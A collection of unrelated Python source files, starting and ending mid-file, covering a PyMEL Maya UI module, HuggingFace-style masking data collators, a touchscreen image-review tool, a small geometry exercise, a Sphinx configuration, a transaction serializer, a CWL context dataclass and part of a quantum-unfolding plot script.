        return cmds.editorTemplate(queryLabel=(nodeName, control))

    @classmethod
    def reload(cls):
        "Reload the template. Beware, this reloads the module in which the template exists!"
        nodeType = cls.nodeType()
        form = "AttrEd" + nodeType + "FormLayout"
        exists = cmds.control(form, exists=1) and cmds.formLayout(form, q=1, ca=1)
        if exists:
            # tear down the existing AE form so it gets rebuilt on next view
            sel = cmds.ls(sl=1)
            cmds.select(cl=True)
            cmds.deleteUI(form)
            if sel:
                cmds.select(sel)
        reload(sys.modules[cls.__module__])

    def addControl(self, control, label=None, changeCommand=None, annotation=None, preventOverride=False, dynamic=False):
        """Add an attribute control to the template. A python changeCommand
        callable is converted to a mel proc via py2mel."""
        args = [control]
        kwargs = {'preventOverride': preventOverride}
        if dynamic:
            kwargs['addDynamicControl'] = True
        else:
            kwargs['addControl'] = True
        if changeCommand:
            if hasattr(changeCommand, '__call__'):
                import pymel.tools.py2mel
                name = self.__class__.__name__ + '_callCustom_changeCommand_' + control
                changeCommand = pymel.tools.py2mel.py2melProc(changeCommand, procName=name, argTypes=['string'])
            args.append(changeCommand)
        if label:
            kwargs['label'] = label
        if annotation:
            kwargs['annotation'] = annotation
        cmds.editorTemplate(*args, **kwargs)

    def callCustom(self, newFunc, replaceFunc, *attrs):
        """Register custom build/replace callbacks for *attrs*; python
        callables are converted to mel procs via py2mel."""
        # cmds.editorTemplate(callCustom=( (newFunc, replaceFunc) + attrs))
        import pymel.tools.py2mel
        if hasattr(newFunc, '__call__'):
            name = self.__class__.__name__ + '_callCustom_newFunc_' + '_'.join(attrs)
            newFunc = pymel.tools.py2mel.py2melProc(newFunc, procName=name, argTypes=['string'] * len(attrs))
        if hasattr(replaceFunc, '__call__'):
            name = self.__class__.__name__ + '_callCustom_replaceFunc_' + '_'.join(attrs)
            replaceFunc = pymel.tools.py2mel.py2melProc(replaceFunc, procName=name, argTypes=['string'] * len(attrs))
        args = (newFunc, replaceFunc) + attrs
        cmds.editorTemplate(callCustom=1, *args)

    def suppress(self, control):
        """Hide *control* from the attribute editor."""
        cmds.editorTemplate(suppress=control)

    def dimControl(self, nodeName, control, state):
        """Dim (grey out) or re-enable *control* for *nodeName*."""
        # nodeName = nodeName if nodeName else self.nodeName
        # print "dim", nodeName
        cmds.editorTemplate(dimControl=(nodeName, control, state))

    def beginLayout(self, name, collapse=True):
        cmds.editorTemplate(beginLayout=name, collapse=collapse)

    def endLayout(self):
        cmds.editorTemplate(endLayout=True)

    def beginScrollLayout(self):
        cmds.editorTemplate(beginScrollLayout=True)

    def endScrollLayout(self):
        cmds.editorTemplate(endScrollLayout=True)

    def beginNoOptimize(self):
        cmds.editorTemplate(beginNoOptimize=True)

    def endNoOptimize(self):
        cmds.editorTemplate(endNoOptimize=True)

    def interruptOptimize(self):
        cmds.editorTemplate(interruptOptimize=True)

    def addSeparator(self):
        cmds.editorTemplate(addSeparator=True)

    def addComponents(self):
        cmds.editorTemplate(addComponents=True)

    def addExtraControls(self, label=None):
        kwargs = {}
        if label:
            kwargs['extraControlsLabel'] = label
        cmds.editorTemplate(addExtraControls=True, **kwargs)

    # TODO: listExtraAttributes
# lazy module that hosts the auto-generated ui wrapper classes
dynModule = _util.LazyLoadModule(__name__, globals())

def _createUIClasses():
    """Register a PyUI subclass on dynModule for every known ui command."""
    for funcName in _factories.uiClassList:
        # Create Class
        classname = _util.capitalize(funcName)
        try:
            cls = dynModule[classname]
        except KeyError:
            # pick the base class from the command-name suffix
            if classname.endswith(('Layout', 'Grp')):
                bases = (Layout,)
            elif classname.endswith('Panel'):
                bases = (Panel,)
            else:
                bases = (PyUI,)
            # stored lazily: the metaclass builds the class on first access
            dynModule[classname] = (_factories.MetaMayaUIWrapper, (classname, bases, {}))

_createUIClasses()
class MainProgressBar(dynModule.ProgressBar):
    '''Context manager for main progress bar

    If an exception occurs after beginProgress() but before endProgress() maya
    gui becomes unresponsive. Use this class to escape this behavior.

    :Parameters:
        minValue : int
            Minimum or starting value of progress indicator. If the progress
            value is less than the minValue, the progress value will be set
            to the minimum. Default value is 0
        maxValue : int
            The maximum or ending value of the progress indicator. If the
            progress value is greater than the maxValue, the progress value
            will be set to the maximum. Default value is 100.
        interruptable : bool
            Set to True if the isCancelled flag should respond to attempts to
            cancel the operation. Setting this to True will make the help
            line display a message to the user indicating that they can cancel
            the operation.

    Here's an example::

        with MainProgressBar(0,20,True) as bar:
            bar.setStatus('Calculating...')
            for i in range(0,20):
                bar.setProgress(i)
                if bar.getIsCancelled():
                    break
    '''

    def __new__(cls, minValue=0, maxValue=100, interruptable=True):
        # Wrap Maya's single global main progress bar instead of creating a new one.
        from language import melGlobals
        bar = dynModule.ProgressBar.__new__(
            cls, melGlobals['gMainProgressBar'], create=False)
        bar.setMinValue(minValue)
        bar.setMaxValue(maxValue)
        bar.setIsInterruptable(interruptable)
        return bar

    def __enter__(self):
        self.beginProgress()
        return self

    def __exit__(self, *args):
        # Always end the progress bar, even if the managed block raised.
        self.endProgress()
class VectorFieldGrp(dynModule.FloatFieldGrp):
    """A floatFieldGrp fixed at three fields, read and written as a Vector."""

    def __new__(cls, name=None, create=False, *args, **kwargs):
        if create:
            # Force exactly three fields regardless of caller-supplied flags.
            kwargs.pop('nf', None)
            kwargs['numberOfFields'] = 3
            name = cmds.floatFieldGrp(name, *args, **kwargs)
        return dynModule.FloatFieldGrp.__new__(cls, name, create=False, *args, **kwargs)

    def getVector(self):
        """Return the three field values as a datatypes.Vector."""
        import datatypes
        x = cmds.floatFieldGrp(self, q=1, v1=True)
        y = cmds.floatFieldGrp(self, q=1, v2=True)
        z = cmds.floatFieldGrp(self, q=1, v3=True)
        return datatypes.Vector([x, y, z])

    def setVector(self, vec):
        """Fill the three fields from any length-3 sequence."""
        cmds.floatFieldGrp(self, e=1, v1=vec[0], v2=vec[1], v3=vec[2])
class PathButtonGrp(dynModule.TextFieldButtonGrp):
    """A textFieldButtonGrp whose 'Browse' button opens a path prompt.

    The prompt used is looked up on the ``windows`` module by the name in
    ``PROMPT_FUNCTION``, so subclasses can swap in a different dialog
    (see FolderButtonGrp).
    """
    PROMPT_FUNCTION = 'promptForPath'

    def __new__(cls, name=None, create=False, *args, **kwargs):
        if create:
            # Fix: 'import windows' appeared twice in this branch; a single
            # import covers both uses below.
            import windows
            # Force our own browse button, discarding caller-supplied
            # label/command flags in either short or long form.
            kwargs.pop('bl', None)
            kwargs['buttonLabel'] = 'Browse'
            kwargs.pop('bc', None)
            kwargs.pop('buttonCommand', None)
            name = cmds.textFieldButtonGrp(name, *args, **kwargs)
            promptFunction = getattr(windows, cls.PROMPT_FUNCTION)

            def setPathCB(name):
                # Show the prompt; only update the field (firing its change
                # command) when the user actually picked something.
                f = promptFunction()
                if f:
                    cmds.textFieldButtonGrp(name, e=1, text=f, forceChangeCommand=True)

            cb = windows.Callback(setPathCB, name)
            cmds.textFieldButtonGrp(name, e=1, buttonCommand=cb)
        return super(PathButtonGrp, cls).__new__(cls, name, create=False, *args, **kwargs)

    def setPath(self, path, **kwargs):
        """Set the field text; forces the change command unless the caller
        passes fcc/forceChangeCommand explicitly."""
        kwargs['forceChangeCommand'] = kwargs.pop('fcc', kwargs.pop('forceChangeCommand', True))
        self.setText(path, **kwargs)

    def getPath(self):
        """Return the current field text wrapped as a Path object."""
        import system
        return system.Path(self.getText())
class FolderButtonGrp(PathButtonGrp):
    """PathButtonGrp variant whose browse button prompts for a folder."""
    PROMPT_FUNCTION = 'promptForFolder'
# most of the keys here are names that are only used in certain circumstances
# Maps UI object type names to the command used to edit/query them, for the
# cases where the reported type name differs from the command name.
_uiTypesToCommands = {
    'radioCluster': 'radioCollection',
    'rowGroupLayout': 'rowLayout',
    'TcolorIndexSlider': 'rowLayout',
    'TcolorSlider': 'rowLayout',
    'floatingWindow': 'window',
    'field': 'textField',
    'staticText': 'text'
}

# Kick the lazy-module machinery so the classes registered above are
# installed into this module's namespace.
dynModule._lazyModule_update()
|
# Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from dataclasses import dataclass
from typing import List, Dict, Optional, Tuple, Union, Any
import torch
from transformers import (
BatchEncoding,
PreTrainedTokenizerBase,
)
from transformers.data.data_collator import (
DataCollatorMixin,
_torch_collate_batch
)
from transformers.file_utils import PaddingStrategy
@dataclass
class DataCollatorForTargetedMasking(DataCollatorMixin):
    """
    Data collator used for random masking of targeted classes of token.
    Useful for learning language models based on masking part-of-speech tokens.
    Instead of masking any random token as in MLM, only token that belong to a defined class
    (flagged per position by the `tag_mask` feature of each example) are masked.
    Inputs are dynamically padded to the maximum length of a batch if they
    are not all of the same length.
    Args:
        tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
            The tokenizer used for encoding the data.
        mlm (`bool`, *optional*, defaults to `True`):
            Whether or not to use masked language modeling. If set to `False`, the labels are the same as the inputs
            with the padding tokens ignored (by setting them to -100). Otherwise, the labels are -100 for non-masked
            tokens and the value to predict for the masked token.
        mlm_probability (`float`, *optional*, defaults to 1.0):
            The probability with which to mask each token flagged by `tag_mask`.
        pad_to_multiple_of (`int`, *optional*):
            If set will pad the sequence to a multiple of the provided value.
        return_tensors (`str`):
            The type of Tensor to return. Allowable values are "np", "pt" and "tf".
    <Tip>
    For best performance, this data collator should be used with a dataset having items that are dictionaries or
    BatchEncoding, with the `"special_tokens_mask"` key, as returned by a [`PreTrainedTokenizer`] or a
    [`PreTrainedTokenizerFast`] with the argument `return_special_tokens_mask=True`.
    </Tip>"""
    tokenizer: PreTrainedTokenizerBase
    # NOTE(review): `mlm` is declared but never consulted in torch_call below —
    # confirm whether the mlm=False path is meant to be supported.
    mlm: bool = True
    mlm_probability: float = 1.0
    pad_to_multiple_of: Optional[int] = None
    tf_experimental_compile: bool = False
    return_tensors: str = "pt"

    def torch_call(self, examples: List[Union[List[int], Any, Dict[str, Any]]]) -> Dict[str, Any]:
        """Pad a batch and mask input ids at the positions flagged by `tag_mask`.

        Raises ValueError when the examples carry no 'tag_mask' feature.
        Note: mutates the examples in place (pops 'tag_mask' and 'labels').
        """
        # In addition to input_ids, a feature 'tag_mask' needs to be provided to specify which token might be masked.
        tag_mask = [example['tag_mask'] for example in examples] if 'tag_mask' in examples[0].keys() else None
        if tag_mask is None:
            raise ValueError(
                "A mask should be provided to indicate which input token class to mask."
            )
        # pop tag_mask from examples before padding to avoid tokenizer being confused
        # in case labels are provided by a token classification dataset, pop them too
        for e in examples:
            e.pop('tag_mask')
            if 'labels' in e:
                e.pop('labels')
        # Handle dict or lists with proper padding and conversion to tensor.
        if isinstance(examples[0], (dict, BatchEncoding)):
            batch = self.tokenizer.pad(examples, return_tensors="pt", pad_to_multiple_of=self.pad_to_multiple_of)
        else:
            batch = {
                "input_ids": _torch_collate_batch(examples, self.tokenizer, pad_to_multiple_of=self.pad_to_multiple_of)
            }
        # padding the mask (not handled by the tokenizer) to same uniform length as input_ids
        sequence_length = len(batch["input_ids"][0])
        padding_side = self.tokenizer.padding_side
        if padding_side == "right":
            tag_mask = [x + [0] * (sequence_length - len(x)) for x in tag_mask]
        else:
            tag_mask = [[0] * (sequence_length - len(x)) + x for x in tag_mask]
        # tensorify the mask
        tag_mask = torch.tensor(tag_mask, dtype=torch.uint8)
        # input_ids are already tensors, see tokenizer return_tensors="pt"
        batch["input_ids"], batch["labels"] = self.torch_tag_mask_tokens(batch["input_ids"], tag_mask)
        return batch

    def torch_tag_mask_tokens(self, inputs: torch.Tensor, mask: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
        """Masks the input as specified by the tag mask prepared by the loader"""
        targets = inputs.clone()
        # create and initialize to zeros the probability matrix for masking
        probability_matrix = torch.zeros_like(targets, dtype=torch.float64)
        # update in-place probability to the set mlm_probability value where mask is true
        probability_matrix.masked_fill_(mask.bool(), value=self.mlm_probability)
        # use the probability at each position to randomly mask or not
        masked_indices = torch.bernoulli(probability_matrix).bool()
        # replace input_ids by the mask token id at position that need to be masked
        inputs[masked_indices] = self.tokenizer.mask_token_id
        # we train to only predict the masked position
        targets[~masked_indices] = -100  # We only compute loss on masked tokens
        return inputs, targets
@dataclass
class DataCollatorForMaskedTokenClassification(DataCollatorMixin):
    """
    Data collator that will dynamically pad the inputs received, as well as the labels.
    Args:
        tokenizer (:class:`~transformers.PreTrainedTokenizer` or :class:`~transformers.PreTrainedTokenizerFast`):
            The tokenizer used for encoding the data.
        padding (:obj:`bool`, :obj:`str` or :class:`~transformers.file_utils.PaddingStrategy`, `optional`, defaults to :obj:`True`):
            Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
            among:
            * :obj:`True` or :obj:`'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
              sequence if provided).
            * :obj:`'max_length'`: Pad to a maximum length specified with the argument :obj:`max_length` or to the
              maximum acceptable input length for the model if that argument is not provided.
            * :obj:`False` or :obj:`'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of
              different lengths).
        max_length (:obj:`int`, `optional`):
            Maximum length of the returned list and optionally padding length (see above).
        pad_to_multiple_of (:obj:`int`, `optional`):
            If set will pad the sequence to a multiple of the provided value.
            This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
            7.5 (Volta).
        label_pad_token_id (:obj:`int`, `optional`, defaults to -100):
            The id to use when padding the labels (-100 will be automatically ignore by PyTorch loss functions).
        masking_probability (float, defaults to 0.0):
            Probability of replacing a `tag_mask`-flagged token with the mask token.
        replacement_probability (float, defaults to 0.0):
            Probability of replacing a `tag_mask`-flagged, not-yet-masked token with a random token.
        select_labels (bool, defaults to False):
            Whether use only the labels at the masked position to calculate the loss
    """
    tokenizer: PreTrainedTokenizerBase
    padding: Union[bool, str, PaddingStrategy] = True
    max_length: Optional[int] = None
    pad_to_multiple_of: Optional[int] = None
    label_pad_token_id: int = -100
    return_tensors: str = "pt"
    masking_probability: float = .0
    replacement_probability: float = .0
    select_labels: bool = False

    def torch_call(self, features) -> Dict[str, torch.Tensor]:
        """
        In addition to input_ids, a feature 'tag_mask' needs to be provided to specify which token might be masked.
        """
        if 'tag_mask' in features[0].keys():
            tag_mask = [feature['tag_mask'] for feature in features]
        else:
            raise ValueError("A mask should be provided to indicate which input token class to mask.")
        label_name = "label" if "label" in features[0].keys() else "labels"
        if label_name in features[0].keys():
            labels = [feature[label_name] for feature in features]
        else:
            raise ValueError("A feature 'label' or 'labels' should be provided for token classification")
        batch = self.tokenizer.pad(
            features,
            padding=self.padding,
            max_length=self.max_length,
            pad_to_multiple_of=self.pad_to_multiple_of
        )
        # batch['input_ids'] are now padded
        # we still need to 'manually' pad the labels and the tag mask
        sequence_length = len(batch["input_ids"][0])
        padding_side = self.tokenizer.padding_side
        if padding_side == "right":
            batch["tag_mask"] = [x + [0] * (sequence_length - len(x)) for x in tag_mask]
            batch["labels"] = [x + [self.label_pad_token_id] * (sequence_length - len(x)) for x in labels]
        else:
            batch["tag_mask"] = [[0] * (sequence_length - len(x)) + x for x in tag_mask]
            batch["labels"] = [[self.label_pad_token_id] * (sequence_length - len(x)) + x for x in labels]
        # convert dict of list of lists into dict of tensors
        batch = {k: torch.tensor(v, dtype=torch.int64) for k, v in batch.items()}
        # stochastically mask input ids according to tag_mask
        batch["input_ids"], batch["labels"] = self.tag_mask_tokens(batch["input_ids"], batch["labels"], batch["tag_mask"])
        # remove tag_mask from batch as it would be rejected by model.forward()
        batch.pop("tag_mask")
        return batch

    def tag_mask_tokens(self, inputs: torch.Tensor, targets: torch.Tensor, mask: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
        """Masks the input as specified by the tag mask prepared by the loader"""
        inputs = inputs.clone()  # not sure if necessary; might be safer to avoid changing input features when provided as tensor
        if self.select_labels:
            targets = targets.clone()
        # create the probability matrix for masking
        masking_probability_matrix = torch.full(inputs.size(), self.masking_probability)
        # use the probability matrix to draw whether to replace or not and intersect with the mask
        masked_indices = torch.bernoulli(masking_probability_matrix).bool() & mask.bool()
        # replace input_ids by the mask token id at position that need to be masked
        inputs[masked_indices] = self.tokenizer.mask_token_id
        # second probability matrix is to determine whether to randomize remaining marked tokens
        replacement_probability_matrix = torch.full(inputs.size(), self.replacement_probability)
        # indices of token to replace found by drawing from prob matrix and intersecting with mask but excluding already masked positions
        replaced_indices = torch.bernoulli(replacement_probability_matrix).bool() & mask.bool() & ~masked_indices
        # draw random int from vocab size of tokenizer and fill tensor of shape like input
        random_input_ids = torch.randint(len(self.tokenizer), inputs.size(), dtype=torch.long)
        # at the replacement indices, change to random token
        inputs[replaced_indices] = random_input_ids[replaced_indices]
        if self.select_labels:
            # only labels at the marked position (irrespective of whether they are masked) will be used for calculating the loss
            targets[~mask] = -100
        return inputs, targets
@dataclass
class MyDataCollatorForSeq2Seq:
    """
    Data collator that will dynamically pad the inputs received, as well as the labels.
    Args:
        tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]):
            The tokenizer used for encoding the data.
        model ([`PreTrainedModel`]):
            The model that is being trained. If set and has the *prepare_decoder_input_ids_from_labels*, use it to
            prepare the *decoder_input_ids*
            This is useful when using *label_smoothing* to avoid calculating loss twice.
        padding (`bool`, `str` or [`~file_utils.PaddingStrategy`], *optional*, defaults to `True`):
            Select a strategy to pad the returned sequences (according to the model's padding side and padding index)
            among:
            - `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
              sequence is provided).
            - `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the
              maximum acceptable input length for the model if that argument is not provided.
            - `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of
              different lengths).
        max_length (`int`, *optional*):
            Maximum length of the returned list and optionally padding length (see above).
        pad_to_multiple_of (`int`, *optional*):
            If set will pad the sequence to a multiple of the provided value.
            This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >=
            7.5 (Volta).
        label_pad_token_id (`int`, *optional*, defaults to -100):
            The id to use when padding the labels (-100 will be automatically ignored by PyTorch loss functions).
        return_tensors (`str`):
            The type of Tensor to return. Allowable values are "np", "pt" and "tf".
    """
    tokenizer: PreTrainedTokenizerBase
    model: Optional[Any] = None
    padding: Union[bool, str, PaddingStrategy] = True
    max_length: Optional[int] = None
    pad_to_multiple_of: Optional[int] = None
    label_pad_token_id: int = -100
    return_tensors: str = "pt"

    def __call__(self, features, return_tensors=None):
        """Pad inputs and labels to a batch; optionally add decoder_input_ids.

        Note: mutates the incoming feature dicts in place (their 'labels' are
        padded before tokenizer.pad is called).
        """
        import numpy as np
        if return_tensors is None:
            return_tensors = self.return_tensors
        labels = [feature["labels"] for feature in features] if "labels" in features[0].keys() else None
        # We have to pad the labels before calling `tokenizer.pad` as this method won't pad them and needs them of the
        # same length to return tensors.
        if labels is not None:
            max_label_length = max(len(l) for l in labels)
            if self.pad_to_multiple_of is not None:
                # Round the label length up to the nearest multiple.
                max_label_length = (
                    (max_label_length + self.pad_to_multiple_of - 1)
                    // self.pad_to_multiple_of
                    * self.pad_to_multiple_of
                )
            if self.max_length is not None:
                assert max_label_length <= self.max_length, f"{max_label_length} > {self.max_length}"
            padding_side = self.tokenizer.padding_side
            for feature in features:
                remainder = [self.label_pad_token_id] * (max_label_length - len(feature["labels"]))
                if isinstance(feature["labels"], list):
                    feature["labels"] = (
                        feature["labels"] + remainder if padding_side == "right" else remainder + feature["labels"]
                    )
                elif padding_side == "right":
                    feature["labels"] = np.concatenate([feature["labels"], remainder]).astype(np.int64)
                else:
                    feature["labels"] = np.concatenate([remainder, feature["labels"]]).astype(np.int64)
        features = self.tokenizer.pad(
            features,
            padding=self.padding,
            max_length=self.max_length,
            pad_to_multiple_of=self.pad_to_multiple_of,
            return_tensors=return_tensors,
        )
        # prepare decoder_input_ids
        if self.model is not None and hasattr(self.model, "prepare_decoder_input_ids_from_labels"):
            decoder_input_ids = self.model.prepare_decoder_input_ids_from_labels(labels=features["labels"])
            features["decoder_input_ids"] = decoder_input_ids
        return features
from display import show
from pathlib import Path
from PIL import Image, ImageDraw, ImageFont
def get_images():
    """Return the JPEG files in ./out as a path list, sorted by name."""
    # sorted() accepts any iterable, so the intermediate list() was redundant.
    return sorted(Path('out').glob('*.jpg'))
# Screen dimensions in pixels.
w = 480
h = 320
# Delete button rectangle [x0, y0, x1, y1]: middle third horizontally,
# bottom sixth of the screen vertically.
delete_button_coords = [
    int(w / 3),
    int(h / 6 * 5),
    int(w / 3 * 2),
    int(h-2),
]
class Review:
    """Touchscreen review UI for the JPEGs in ./out.

    Tap the left half for the previous image, right half for the next, and
    the bottom-center button twice ('Delete' then 'Confirm') to delete.
    """

    # Class-level defaults; all are re-assigned per instance in __init__.
    i = 0            # index of the image currently displayed
    image_len = 0    # cached len(image_list)
    confirm = False  # True while waiting for delete confirmation
    image_list = []

    def __init__(self):
        self.image_list = get_images()
        self.image_len = len(self.image_list)
        # Start on the last (most recently named) image.
        self.i = self.image_len - 1
        self.refresh()

    def press(self, x, y):
        """Handle a touch at pixel (x, y)."""
        if self.image_len == 0:
            return
        elif x >= delete_button_coords[0] and x <= delete_button_coords[2] and y >= delete_button_coords[1] and y <= delete_button_coords[3]:
            # Inside the delete button: first tap arms, second tap deletes.
            if not self.confirm:
                self.confirm = True
                self.refresh()
            else:
                self.delete()
                self.confirm = False
                self.refresh()
        elif x < w / 2:
            # NOTE(review): confirm is cleared after nav() has already
            # redrawn, so an armed 'Confirm' label persists until the next
            # refresh — verify this is intended.
            self.nav(-1)
            self.confirm = False
        else:
            self.nav(1)
            self.confirm = False

    def nav(self, n):
        """Move n images forward/backward, wrapping around at either end."""
        self.i = (self.i + n) % self.image_len
        self.refresh()

    def delete(self):
        """Delete the current image from disk and re-scan the directory."""
        self.image_list[self.i].unlink()
        self.image_list = get_images()
        self.image_len = len(self.image_list)
        # Clamp the index when the last list entry was removed.
        if self.i > len(self.image_list) - 1:
            self.i -= 1

    def refresh(self):
        """Redraw the display: image (or placeholder), counter, delete button."""
        fnt = ImageFont.truetype("Roboto-Thin.ttf", 26)
        if self.image_len == 0:
            # Nothing to show: draw a bordered placeholder with centered text.
            image = Image.new('RGB', (w, h))
            draw = ImageDraw.Draw(image)
            draw.rectangle((0,0,w-1, h-1), outline=(255,255,255), fill=(0,0,0))
            txt = 'No Images!'
            txtw, txth = draw.textsize(txt,font=fnt)
            draw.text((
                w / 2 - txtw / 2,
                h / 2 - txth / 2
            ), txt,font=fnt, fill=(255,255,255))
        else:
            image = Image.open(str(self.image_list[self.i]))
            image = image.resize((480,320), Image.NEAREST)
            draw = ImageDraw.Draw(image)
            draw.rectangle((0,0,image.size[0]-1, image.size[1]-1), outline=(255,255,255))
            # Counter badge in the top-left corner.
            txt = '{}/{}'.format(self.i+1, self.image_len)
            txtw, txth = draw.textsize(txt,font=fnt)
            draw.rectangle((1,1,txtw+1,txth+1), fill=(0,0,0))
            draw.text((1,1), txt,font=fnt, fill=(255,255,255))
            # Delete button; label reflects the confirmation state.
            txt = 'Confirm' if self.confirm else 'Delete'
            txtw, txth = draw.textsize(txt,font=fnt)
            draw.rectangle(delete_button_coords, fill=(0,0,0), outline=(255,255,255))
            draw.text((
                (delete_button_coords[2] + delete_button_coords[0]) / 2 - txtw / 2,
                (delete_button_coords[3] + delete_button_coords[1]) / 2 - txth / 2
            ), txt,font=fnt, fill=(255,255,255))
        show(image)
|
def IsPointInSquare(x, y):
    """Return True when (x, y) lies in the closed square [-1, 1] x [-1, 1]."""
    return -1 <= x <= 1 and -1 <= y <= 1
# Read the point coordinates from stdin, one per line.
x = float(input())
y = float(input())
# The function already returns a bool, so comparing with "is True" was
# redundant (and "is" comparisons on results are fragile in general).
if IsPointInSquare(x, y):
    print('YES')
else:
    print('NO')
|
# Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
import datetime as dt
import json
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
from pathlib import Path
import gobbli
# Directory containing this conf.py; used below to locate repo-level files.
file_loc = os.path.split(__file__)[0]
sys.path.insert(0, os.path.join(os.path.dirname(file_loc), "."))
# -- Project information -----------------------------------------------------
# Project name/author/version live in ../meta.json so they can be shared
# with other tooling.
with open(os.path.join(file_loc, "..", "meta.json"), "r") as f:
    meta = json.load(f)
project = meta["name"]
author = meta["author"]
copyright = f"{dt.date.today().year}, {author}"
# The full version, including alpha/beta/rc tags
version = meta["version"]
release = version
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    "sphinx.ext.autodoc",
    "sphinx.ext.coverage",
    "sphinx.ext.viewcode",
    "sphinx.ext.autosummary",
    "sphinx.ext.intersphinx",
    "sphinx.ext.napoleon",
    "sphinx_autodoc_typehints",
    "sphinx_paramlinks",
]
# Default autodoc flags (None = flag enabled with no argument).
autodoc_default_options = {
    "members": None,
    "inherited-members": None,
    "show-inheritance": None,
}
# Concatenate the class docstring and the __init__ docstring.
autoclass_content = "both"
autosummary_generate = True
# External inventories for cross-references to dependency docs.
intersphinx_mapping = {
    "docker": ("https://docker-py.readthedocs.io/en/stable/", None),
    "ray": ("https://ray.readthedocs.io/en/stable/", None),
    "sklearn": ("https://scikit-learn.org/stable", None),
}
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
html_theme = "alabaster"
html_theme_options = {
    "description": "Deep learning with text doesn't have to be scary",
    "logo": "gobbli_lg.svg",
    "touch_icon": "gobbli_app.svg",
    "github_banner": "true",
    "github_button": "true",
    "github_repo": "gobbli",
    "github_user": "RTIInternational",
    "page_width": "1040px",
}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
html_sidebars = {
    "**": ["about.html", "navigation.html", "relations.html", "searchbox.html"]
}
html_favicon = os.path.join("_static", "gobbli_favicon.ico")
html_title = f"gobbli {version} documentation"
# Autogenerate API docs
def run_apidoc(_):
    """Regenerate the API reference under docs/auto from the package sources."""
    from sphinx.ext.apidoc import main

    # Repository root (this file lives one level below it).
    repo_root = Path(__file__).parent.parent.resolve()
    auto_dir = repo_root / "docs" / "auto"
    apidoc_args = [
        "--no-toc",
        "--separate",
        "-o",
        str(auto_dir),
        str(repo_root / project),
        str(repo_root / project / "model" / "*" / "src"),
    ]
    main(apidoc_args)
def setup(app):
    """Sphinx entry point: hook API-doc generation into the build start."""
    app.connect("builder-inited", run_apidoc)
|
from crypto.transactions.serializers.base import BaseSerializer
class DelegateResignationSerializer(BaseSerializer):
    """Serializer handling delegate resignation data

    A delegate resignation carries no type-specific payload, so serializing
    simply returns the bytes accumulated by the base serializer.
    """

    def serialize(self):
        # No asset-specific fields to append for this transaction type.
        return self.bytes_data
|
"""This keeps track of any context needed for auto-completions and expression evaluations
This therefore carries """
# Copyright (c) 2019 Seven Bridges. See LICENSE
from dataclasses import dataclass
from typing import List, Optional

from .intelligence import IntelligenceNode
from .workflow import Workflow, WFStepIntelligence
@dataclass
class IntelligenceContext:
    """Context carried through auto-completion and expression evaluation.

    All fields default to None, so their annotations are Optional — the
    previous bare `List[str]`/`Workflow` annotations contradicted the
    None defaults.
    """
    path: Optional[List[str]] = None
    workflow: Optional[Workflow] = None
    workflow_step_intelligence: Optional[WFStepIntelligence] = None
    requirements: Optional[IntelligenceNode] = None
def copy_context(old: IntelligenceContext) -> IntelligenceContext:
    """Return a copy of *old* with an independent copy of its path list.

    Fix: old.path defaults to None, and list(None) raises TypeError —
    guard the copy so a default-constructed context can also be copied.
    """
    return IntelligenceContext(
        path=list(old.path) if old.path is not None else None,
        workflow=old.workflow,
        workflow_step_intelligence=old.workflow_step_intelligence,
        requirements=old.requirements)
|
#!/usr/bin/env python3
import argparse
import numpy as np
import pandas as pd
#import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import colors
from matplotlib import rc
# Serif (Palatino) fonts with LaTeX rendering for all plot text.
rc('font', **{'family': 'serif', 'serif': ['Palatino']})
rc('text', usetex=True)
rc('legend', **{'fontsize': 13})
#sns.set(style="white")
np.set_printoptions(precision=2, linewidth=500, suppress=True)
# Command-line options: which observable to plot and the bit encoding used
# by the unfolding whose results we read.
parser = argparse.ArgumentParser("Quantum unfolding plotter")
parser.add_argument('-o', '--observable', default='peak')
parser.add_argument('-e', '--encoding', default=4)
args = parser.parse_args()
nbits = int(args.encoding)
obs = args.observable
# Methods whose correlation matrices are plotted; commented entries are
# kept for quick re-enabling.
known_methods = [
    'qpu_hinoise_reg0',
    'qpu_lonoise_reg0',
    # 'qpu_lonoise_reg0_gamma0',
    # 'qpu_lonoise_reg0_gamma1',
    # 'qpu_lonoise_reg0_gamma0_48bits',
]
n_methods = len(known_methods)
# Human-readable legend text per method key.  Raw strings keep the LaTeX
# "\gamma" from being parsed as a (deprecated) invalid string escape; the
# resulting values are byte-identical to before.
labels = {
